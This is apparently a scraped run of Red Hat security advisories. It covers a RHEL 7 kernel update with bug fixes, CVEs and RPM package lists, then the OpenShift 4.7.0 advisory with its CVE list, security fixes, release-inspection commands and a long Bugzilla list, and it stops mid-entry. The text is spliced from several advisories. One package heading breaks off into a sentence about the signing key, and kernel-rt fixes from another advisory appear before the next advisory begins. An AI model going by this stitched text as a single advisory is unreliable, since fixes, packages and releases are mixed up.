  • [DELL EMC 7.9 Bug]: No acpi_pad threads on top command for "power cap policy equal to 0 watts" (BZ#1883174)

  • A race between i40e_ndo_set_vf_mac() and i40e_vsi_clear() in the i40e driver causes a use after free condition of the kmalloc-4096 slab cache. (BZ#1886003)

  • netxen driver performs poorly with RT kernel (BZ#1894274)

  • gendisk->disk_part_tbl->last_lookup retains pointer after partition deletion (BZ#1898596)

  • Kernel experiences panic in update_group_power() due to division error even with Bug 1701115 fix (BZ#1910763)

  • RHEL7.9 - zfcp: fix handling of FCP_RESID_OVER bit in fcp ingress path (BZ#1917839)

  • RHEL7.9 - mm/THP: do not access vma->vm_mm after calling handle_userfault (BZ#1917840)

  • raid: wrong raid io account (BZ#1927106)

  • qla2x00_status_cont_entry() missing upstream patch that prevents unnecessary ABRT/warnings (BZ#1933784)

  • RHEL 7.9.z - System hang caused by workqueue stall in qla2xxx driver (BZ#1937945)

  • selinux: setsebool can trigger a deadlock (BZ#1939091)

  • [Hyper-V][RHEL-7] Cannot boot kernel 3.10.0-1160.21.1.el7.x86_64 on Hyper-V (BZ#1941841)

  • Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect. Bugs fixed (https://bugzilla.redhat.com/):

1802559 - CVE-2020-8648 kernel: use-after-free in n_tty_receive_buf_common function in drivers/tty/n_tty.c 1922249 - CVE-2021-3347 kernel: Use after free via PI futex state 1930246 - CVE-2020-12362 kernel: Integer overflow in Intel(R) Graphics Drivers 1930249 - CVE-2020-12363 kernel: Improper input validation in some Intel(R) Graphics Drivers 1930251 - CVE-2020-12364 kernel: Null pointer dereference in some Intel(R) Graphics Drivers 1940627 - CVE-2020-27170 kernel: Speculation on pointer arithmetic against bpf_context pointer 1941841 - [Hyper-V][RHEL-7] Cannot boot kernel 3.10.0-1160.21.1.el7.x86_64 on Hyper-V

  1. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source: kernel-3.10.0-1160.31.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.31.1.el7.noarch.rpm kernel-doc-3.10.0-1160.31.1.el7.noarch.rpm

x86_64: bpftool-3.10.0-1160.31.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debug-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm kernel-devel-3.10.0-1160.31.1.el7.x86_64.rpm kernel-headers-3.10.0-1160.31.1.el7.x86_64.rpm kernel-tools-3.10.0-1160.31.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.31.1.el7.x86_64.rpm perf-3.10.0-1160.31.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm python-perf-3.10.0-1160.31.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

Source: kernel-3.10.0-1160.31.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.31.1.el7.noarch.rpm kernel-doc-3.10.0-1160.31.1.el7.noarch.rpm

x86_64: bpftool-3.10.0-1160.31.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debug-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm kernel-devel-3.10.0-1160.31.1.el7.x86_64.rpm kernel-headers-3.10.0-1160.31.1.el7.x86_64.rpm kernel-tools-3.10.0-1160.31.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.31.1.el7.x86_64.rpm perf-3.10.0-1160.31.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm python-perf-3.10.0-1160.31.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64: bpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1160.31.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source: kernel-3.10.0-1160.31.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.31.1.el7.noarch.rpm kernel-doc-3.10.0-1160.31.1.el7.noarch.rpm

ppc64: bpftool-3.10.0-1160.31.1.el7.ppc64.rpm bpftool-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm kernel-3.10.0-1160.31.1.el7.ppc64.rpm kernel-bootwrapper-3.10.0-1160.31.1.el7.ppc64.rpm kernel-debug-3.10.0-1160.31.1.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm kernel-debug-devel-3.10.0-1160.31.1.el7.ppc64.rpm kernel-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-1160.31.1.el7.ppc64.rpm kernel-devel-3.10.0-1160.31.1.el7.ppc64.rpm kernel-headers-3.10.0-1160.31.1.el7.ppc64.rpm kernel-tools-3.10.0-1160.31.1.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm kernel-tools-libs-3.10.0-1160.31.1.el7.ppc64.rpm perf-3.10.0-1160.31.1.el7.ppc64.rpm perf-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm python-perf-3.10.0-1160.31.1.el7.ppc64.rpm python-perf-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm

ppc64le: bpftool-3.10.0-1160.31.1.el7.ppc64le.rpm bpftool-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm kernel-3.10.0-1160.31.1.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-1160.31.1.el7.ppc64le.rpm kernel-debug-3.10.0-1160.31.1.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-1160.31.1.el7.ppc64le.rpm kernel-devel-3.10.0-1160.31.1.el7.ppc64le.rpm kernel-headers-3.10.0-1160.31.1.el7.ppc64le.rpm kernel-tools-3.10.0-1160.31.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm kernel-tools-libs-3.10.0-1160.31.1.el7.ppc64le.rpm perf-3.10.0-1160.31.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm python-perf-3.10.0-1160.31.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm

s390x: bpftool-3.10.0-1160.31.1.el7.s390x.rpm bpftool-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm kernel-3.10.0-1160.31.1.el7.s390x.rpm kernel-debug-3.10.0-1160.31.1.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm kernel-debug-devel-3.10.0-1160.31.1.el7.s390x.rpm kernel-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-1160.31.1.el7.s390x.rpm kernel-devel-3.10.0-1160.31.1.el7.s390x.rpm kernel-headers-3.10.0-1160.31.1.el7.s390x.rpm kernel-kdump-3.10.0-1160.31.1.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm kernel-kdump-devel-3.10.0-1160.31.1.el7.s390x.rpm perf-3.10.0-1160.31.1.el7.s390x.rpm perf-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm python-perf-3.10.0-1160.31.1.el7.s390x.rpm python-perf-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm

x86_64: bpftool-3.10.0-1160.31.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debug-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm kernel-devel-3.10.0-1160.31.1.el7.x86_64.rpm kernel-headers-3.10.0-1160.31.1.el7.x86_64.rpm kernel-tools-3.10.0-1160.31.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.31.1.el7.x86_64.rpm perf-3.10.0-1160.31.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm python-perf-3.10.0-1160.31.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64: bpftool-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm kernel-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-1160.31.1.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-1160.31.1.el7.ppc64.rpm perf-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm python-perf-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm

ppc64le: bpftool-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm kernel-debug-devel-3.10.0-1160.31.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-1160.31.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-1160.31.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm

x86_64: bpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1160.31.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: kernel-3.10.0-1160.31.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1160.31.1.el7.noarch.rpm kernel-doc-3.10.0-1160.31.1.el7.noarch.rpm

x86_64: bpftool-3.10.0-1160.31.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debug-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm kernel-devel-3.10.0-1160.31.1.el7.x86_64.rpm kernel-headers-3.10.0-1160.31.1.el7.x86_64.rpm kernel-tools-3.10.0-1160.31.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1160.31.1.el7.x86_64.rpm perf-3.10.0-1160.31.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm python-perf-3.10.0-1160.31.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. 7) - noarch, x86_64

Bug Fix(es):

  • lru-add-drain workqueue on RT is allocated without being used (BZ#1894587)

  • kernel-rt: update to the latest RHEL7.9.z source tree (BZ#1953118)

  • -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

===================================================================== Red Hat Security Advisory

Synopsis: Moderate: OpenShift Container Platform 4.7.0 security, bug fix, and enhancement update Advisory ID: RHSA-2020:5633-01 Product: Red Hat OpenShift Enterprise Advisory URL: https://access.redhat.com/errata/RHSA-2020:5633 Issue date: 2021-02-24 CVE Names: CVE-2018-10103 CVE-2018-10105 CVE-2018-14461 CVE-2018-14462 CVE-2018-14463 CVE-2018-14464 CVE-2018-14465 CVE-2018-14466 CVE-2018-14467 CVE-2018-14468 CVE-2018-14469 CVE-2018-14470 CVE-2018-14553 CVE-2018-14879 CVE-2018-14880 CVE-2018-14881 CVE-2018-14882 CVE-2018-16227 CVE-2018-16228 CVE-2018-16229 CVE-2018-16230 CVE-2018-16300 CVE-2018-16451 CVE-2018-16452 CVE-2018-20843 CVE-2019-3884 CVE-2019-5018 CVE-2019-6977 CVE-2019-6978 CVE-2019-8625 CVE-2019-8710 CVE-2019-8720 CVE-2019-8743 CVE-2019-8764 CVE-2019-8766 CVE-2019-8769 CVE-2019-8771 CVE-2019-8782 CVE-2019-8783 CVE-2019-8808 CVE-2019-8811 CVE-2019-8812 CVE-2019-8813 CVE-2019-8814 CVE-2019-8815 CVE-2019-8816 CVE-2019-8819 CVE-2019-8820 CVE-2019-8823 CVE-2019-8835 CVE-2019-8844 CVE-2019-8846 CVE-2019-9455 CVE-2019-9458 CVE-2019-11068 CVE-2019-12614 CVE-2019-13050 CVE-2019-13225 CVE-2019-13627 CVE-2019-14889 CVE-2019-15165 CVE-2019-15166 CVE-2019-15903 CVE-2019-15917 CVE-2019-15925 CVE-2019-16167 CVE-2019-16168 CVE-2019-16231 CVE-2019-16233 CVE-2019-16935 CVE-2019-17450 CVE-2019-17546 CVE-2019-18197 CVE-2019-18808 CVE-2019-18809 CVE-2019-19046 CVE-2019-19056 CVE-2019-19062 CVE-2019-19063 CVE-2019-19068 CVE-2019-19072 CVE-2019-19221 CVE-2019-19319 CVE-2019-19332 CVE-2019-19447 CVE-2019-19524 CVE-2019-19533 CVE-2019-19537 CVE-2019-19543 CVE-2019-19602 CVE-2019-19767 CVE-2019-19770 CVE-2019-19906 CVE-2019-19956 CVE-2019-20054 CVE-2019-20218 CVE-2019-20386 CVE-2019-20387 CVE-2019-20388 CVE-2019-20454 CVE-2019-20636 CVE-2019-20807 CVE-2019-20812 CVE-2019-20907 CVE-2019-20916 CVE-2020-0305 CVE-2020-0444 CVE-2020-1716 CVE-2020-1730 CVE-2020-1751 CVE-2020-1752 CVE-2020-1971 CVE-2020-2574 CVE-2020-2752 CVE-2020-2922 CVE-2020-3862 CVE-2020-3864 CVE-2020-3865 CVE-2020-3867 CVE-2020-3868 CVE-2020-3885 CVE-2020-3894 CVE-2020-3895 CVE-2020-3897 CVE-2020-3898 CVE-2020-3899 CVE-2020-3900 CVE-2020-3901 CVE-2020-3902 CVE-2020-6405 CVE-2020-7595 CVE-2020-7774 CVE-2020-8177 CVE-2020-8492 CVE-2020-8563 CVE-2020-8566 CVE-2020-8619 CVE-2020-8622 CVE-2020-8623 CVE-2020-8624 CVE-2020-8647 CVE-2020-8648 CVE-2020-8649 CVE-2020-9327 CVE-2020-9802 CVE-2020-9803 CVE-2020-9805 CVE-2020-9806 CVE-2020-9807 CVE-2020-9843 CVE-2020-9850 CVE-2020-9862 CVE-2020-9893 CVE-2020-9894 CVE-2020-9895 CVE-2020-9915 CVE-2020-9925 CVE-2020-10018 CVE-2020-10029 CVE-2020-10732 CVE-2020-10749 CVE-2020-10751 CVE-2020-10763 CVE-2020-10773 CVE-2020-10774 CVE-2020-10942 CVE-2020-11565 CVE-2020-11668 CVE-2020-11793 CVE-2020-12465 CVE-2020-12655 CVE-2020-12659 CVE-2020-12770 CVE-2020-12826 CVE-2020-13249 CVE-2020-13630 CVE-2020-13631 CVE-2020-13632 CVE-2020-14019 CVE-2020-14040 CVE-2020-14381 CVE-2020-14382 CVE-2020-14391 CVE-2020-14422 CVE-2020-15157 CVE-2020-15503 CVE-2020-15862 CVE-2020-15999 CVE-2020-16166 CVE-2020-24490 CVE-2020-24659 CVE-2020-25211 CVE-2020-25641 CVE-2020-25658 CVE-2020-25661 CVE-2020-25662 CVE-2020-25681 CVE-2020-25682 CVE-2020-25683 CVE-2020-25684 CVE-2020-25685 CVE-2020-25686 CVE-2020-25687 CVE-2020-25694 CVE-2020-25696 CVE-2020-26160 CVE-2020-27813 CVE-2020-27846 CVE-2020-28362 CVE-2020-29652 CVE-2021-2007 CVE-2021-3121 =====================================================================

  1. Summary:

Red Hat OpenShift Container Platform release 4.7.0 is now available.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.7.0. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2020:5634

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html

You may download the oc tool and use it to inspect release image metadata as follows:

(For x86_64 architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.0-x86_64

The image digest is sha256:d74b1cfa81f8c9cc23336aee72d8ae9c9905e62c4874b071317a078c316f8a70

(For s390x architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.0-s390x

The image digest is sha256:a68ca03d87496ddfea0ac26b82af77231583a58a7836b95de85efe5e390ad45d

(For ppc64le architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.0-ppc64le

The image digest is sha256:bc7b04e038c8ff3a33b827f4ee19aa79b26e14c359a7dcc1ced9f3b58e5f1ac6

All OpenShift Container Platform 4.7 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -between-minor.html#understanding-upgrade-channels_updating-cluster-between - -minor.

Security Fix(es):

  • crewjam/saml: authentication bypass in saml authentication (CVE-2020-27846)

  • golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference (CVE-2020-29652)

  • gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)

  • nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774)

  • kubernetes: Secret leaks in kube-controller-manager when using vSphere Provider (CVE-2020-8563)

  • containernetworking/plugins: IPv6 router advertisements allow for MitM attacks on IPv4 clusters (CVE-2020-10749)

  • heketi: gluster-block volume password details available in logs (CVE-2020-10763)

  • golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash (CVE-2020-14040)

  • jwt-go: access restriction bypass vulnerability (CVE-2020-26160)

  • golang-github-gorilla-websocket: integer overflow leads to denial of service (CVE-2020-27813)

  • golang: math/big: panic during recursive division of very large numbers (CVE-2020-28362)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

  1. Solution:

For OpenShift Container Platform 4.7, see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:

https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html

Details on how to access this content are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -cli.html.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1620608 - Restoring deployment config with history leads to weird state 1752220 - [OVN] Network Policy fails to work when project label gets overwritten 1756096 - Local storage operator should implement must-gather spec 1756173 - /etc/udev/rules.d/66-azure-storage.rules missing from initramfs 1768255 - installer reports 100% complete but failing components 1770017 - Init containers restart when the exited container is removed from node. 1775057 - [MSTR-485] Cluster is abnormal after etcd backup/restore when the backup is conducted during etcd encryption is migrating 1775444 - RFE: k8s cpu manager does not restrict /usr/bin/pod cpuset 1777038 - Cluster scaled beyond host subnet limits does not fire alert or cleanly report why it cannot scale 1777224 - InfraID in metadata.json and .openshift_install_state.json is not consistent when repeating create commands 1784298 - "Displaying with reduced resolution due to large dataset." would show under some conditions 1785399 - Under condition of heavy pod creation, creation fails with 'error reserving pod name ...: name is reserved" 1797766 - Resource Requirements" specDescriptor fields - CPU and Memory injects empty string YAML editor 1801089 - [OVN] Installation failed and monitoring pod not created due to some network error. 1805025 - [OSP] Machine status doesn't become "Failed" when creating a machine with invalid image 1805639 - Machine status should be "Failed" when creating a machine with invalid machine configuration 1806000 - CRI-O failing with: error reserving ctr name 1806915 - openshift-service-ca: Some core components are in openshift.io/run-level 1 and are bypassing SCC, but should not be 1806917 - openshift-service-ca-operator: Some core components are in openshift.io/run-level 1 and are bypassing SCC, but should not be 1810438 - Installation logs are not gathered from OCP nodes 1812085 - kubernetes-networking-namespace-pods dashboard doesn't exist 1812412 - Monitoring Dashboard: on restricted cluster, query timed out in expression evaluation 1813012 - EtcdDiscoveryDomain no longer needed 1813949 - openshift-install doesn't use env variables for OS_* for some of API endpoints 1816812 - OpenShift test suites are not resilient to rate limited registries (like docker.io) and cannot control their dependencies for offline use 1819053 - loading OpenAPI spec for "v1beta1.metrics.k8s.io" failed with: OpenAPI spec does not exist 1819457 - Package Server is in 'Cannot update' status despite properly working 1820141 - [RFE] deploy qemu-quest-agent on the nodes 1822744 - OCS Installation CI test flaking 1824038 - Integration Tests: StaleElementReferenceError in OLM single-installmode scenario 1825892 - StorageClasses and PVs are not cleaned completely after running the csi verification tool 1826301 - Wrong NodeStatus reports in file-integrity scan when configuration error in aide.conf file 1829723 - User workload monitoring alerts fire out of the box 1832968 - oc adm catalog mirror does not mirror the index image itself 1833012 - Lower OVNKubernetes HTTP E/W performance compared with OpenShiftSDN 1833220 - CVE-2020-10749 containernetworking/plugins: IPv6 router advertisements allow for MitM attacks on IPv4 clusters 1834995 - olmFull suite always fails once th suite is run on the same cluster 1836017 - vSphere UPI: Both Internal and External load balancers for kube-apiserver should use /readyz 1837953 - Replacing masters doesn't work for ovn-kubernetes 4.4 1838352 - OperatorExited, Pending marketplace-operator-... pod for several weeks 1838751 - [oVirt][Tracker] Re-enable skipped network tests 1839239 - csi-snapshot-controller flickers Degraded=True on etcd hiccups 1840759 - [aws-ebs-csi-driver] The volume created by aws ebs csi driver can not be deleted when the cluster is destroyed 1841039 - authentication-operator: Add e2e test for password grants to Keycloak being set as OIDC IdP 1841119 - Get rid of config patches and pass flags directly to kcm 1841175 - When an Install Plan gets deleted, OLM does not create a new one 1841381 - Issue with memoryMB validation 1841885 - oc adm catalog mirror command attempts to pull from registry.redhat.io when using --from-dir option 1844727 - Etcd container leaves grep and lsof zombie processes 1845387 - CVE-2020-10763 heketi: gluster-block volume password details available in logs 1847074 - Filter bar layout issues at some screen widths on search page 1848358 - CRDs with preserveUnknownFields:true don't reflect in status that they are non-structural 1849543 - [4.5]kubeletconfig's description will show multiple lines for finalizers when upgrade from 4.4.8->4.5 1851103 - Use of NetworkManager-wait-online.service in rhcos-growpart.service 1851203 - [GSS] [RFE] Need a simpler representation of capactiy breakdown in total usage and per project breakdown in OCS 4 dashboard 1851351 - OCP 4.4.9: EtcdMemberIPMigratorDegraded: rpc error: code = Canceled desc = grpc: the client connection is closing 1851693 - The oc apply should return errors instead of hanging there when failing to create the CRD 1852289 - Upgrade testsuite fails on ppc64le environment - Unsupported LoadBalancer service 1853115 - the restriction of --cloud option should be shown in help text. 1853116 - --to option does not work with --credentials-requests flag. 1853352 - [v2v][UI] Storage Class fields Should Not be empty in VM disks view 1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash 1854567 - "Installed Operators" list showing "duplicated" entries during installation 1855325 - [Feature:Prometheus][Conformance] Prometheus when installed on the cluster [Top Level] [Feature:Prometheus][Conformance] Prometheus when installed on the cluster should report telemetry if a cloud.openshift.com token is present 1855351 - Inconsistent Installer reactions to Ctrl-C during user input process 1855408 - OVN cluster unstable after running minimal scale test 1856351 - Build page should show metrics for when the build ran, not the last 30 minutes 1856354 - New APIServices missing from OpenAPI definitions 1857446 - ARO/Azure: excessive pod memory allocation causes node lockup 1857877 - Operator upgrades can delete existing CSV before completion 1858578 - [v2v] [ui] VM import RHV to CNV Target VM Name longer than 63 chars should not be allowed 1859174 - [IPI][OSP] Having errors from 4.3 to 4.6 about Security group rule already created 1860136 - default ingress does not propagate annotations to route object on update 1860322 - [OCPv4.5.2] after unexpected shutdown one of RHV Hypervisors, OCP worker nodes machine are marked as "Failed" 1860518 - unable to stop a crio pod 1861383 - Route with haproxy.router.openshift.io/timeout: 365d kills the ingress controller 1862430 - LSO: PV creation lock should not be acquired in a loop 1862489 - LSO autoprovisioning should exclude top level disks that are part of LVM volume group. 1862608 - Virtual media does not work on hosts using BIOS, only UEFI 1862918 - [v2v] User should only select SRIOV network when importin vm with SRIOV network 1865743 - Some pods are stuck in ContainerCreating and some sdn pods are in CrashLoopBackOff 1865839 - rpm-ostree fails with "System transaction in progress" when moving to kernel-rt 1866043 - Configurable table column headers can be illegible 1866087 - Examining agones helm chart resources results in "Oh no!" 1866261 - Need to indicate the intentional behavior for Ansible in the create api help info 1866298 - [RHOCS Usability Study][Installation] Labeling the namespace should be a part of the installation flow or be clearer as a requirement 1866320 - [RHOCS Usability Study][Dashboard] Users were confused by Available Capacity and the Total Capacity 1866334 - [RHOCS Usability Study][Installation] On the Operator installation page, there’s no indication on which labels offer tooltip/help 1866340 - [RHOCS Usability Study][Dashboard] It was not clear why “No persistent storage alerts” was prominently displayed 1866343 - [RHOCS Usability Study][Dashboard] User wanted to know the time frame for Data Consumption, e.g I/O Operations 1866445 - kola --basic-qemu-scenarios scenario fail on ppc64le & s390x 1866482 - Few errors are seen when oc adm must-gather is run 1866605 - No metadata.generation set for build and buildconfig objects 1866873 - MCDDrainError "Drain failed on , updates may be blocked" missing rendered node name 1866901 - Deployment strategy for BMO allows multiple pods to run at the same time 1866925 - openshift-install destroy cluster should fail quickly when provided with invalid credentials on Azure. 1867165 - Cannot assign static address to baremetal install bootstrap vm 1867380 - When using webhooks in OCP 4.5 fails to rollout latest deploymentconfig 1867400 - [OCs 4.5]UI should not allow creation of second storagecluster of different mode in a single OCS 1867477 - HPA monitoring cpu utilization fails for deployments which have init containers 1867518 - [oc] oc should not print so many goroutines when ANY command fails 1867608 - ds/machine-config-daemon takes 100+ minutes to rollout on 250 node cluster 1867965 - OpenShift Console Deployment Edit overwrites deployment yaml 1868004 - opm index add appears to produce image with wrong registry server binary 1868065 - oc -o jsonpath prints possible warning / bug "Unable to decode server response into a Table" 1868104 - Baremetal actuator should not delete Machine objects 1868125 - opm index add is not creating an index with valid images when --permissive flag is added, the index is empty instead 1868384 - CLI does not save login credentials as expected when using the same username in multiple clusters 1868527 - OpenShift Storage using VMWare vSAN receives error "Failed to add disk 'scsi0:2'" when mounted pod is created on separate node 1868645 - After a disaster recovery pods a stuck in "NodeAffinity" state and not running 1868748 - ClusterProvisioningIP in baremetal platform has wrong JSON annotation 1868765 - [vsphere][ci] could not reserve an IP address: no available addresses 1868770 - catalogSource named "redhat-operators" deleted in a disconnected cluster 1868976 - Prometheus error opening query log file on EBS backed PVC 1869293 - The configmap name looks confusing in aide-ds pod logs 1869606 - crio's failing to delete a network namespace 1870337 - [sig-storage] Managed cluster should have no crashlooping recycler pods over four minutes 1870342 - [sig-scheduling] SchedulerPredicates [Serial] validates resource limits of pods that are allowed to run [Conformance] 1870373 - Ingress Operator reports available when DNS fails to provision 1870467 - D/DC Part of Helm / Operator Backed should not have HPA 1870728 - openshift-install creates expired ignition files from stale .openshift_install_state.json 1870800 - [4.6] Managed Column not appearing on Pods Details page 1871170 - e2e tests are needed to validate the functionality of the etcdctl container 1872001 - EtcdDiscoveryDomain no longer needed 1872095 - content are expanded to the whole line when only one column in table on Resource Details page 1872124 - Could not choose device type as "disk" or "part" when create localvolumeset from web console 1872128 - Can't run container with hostPort on 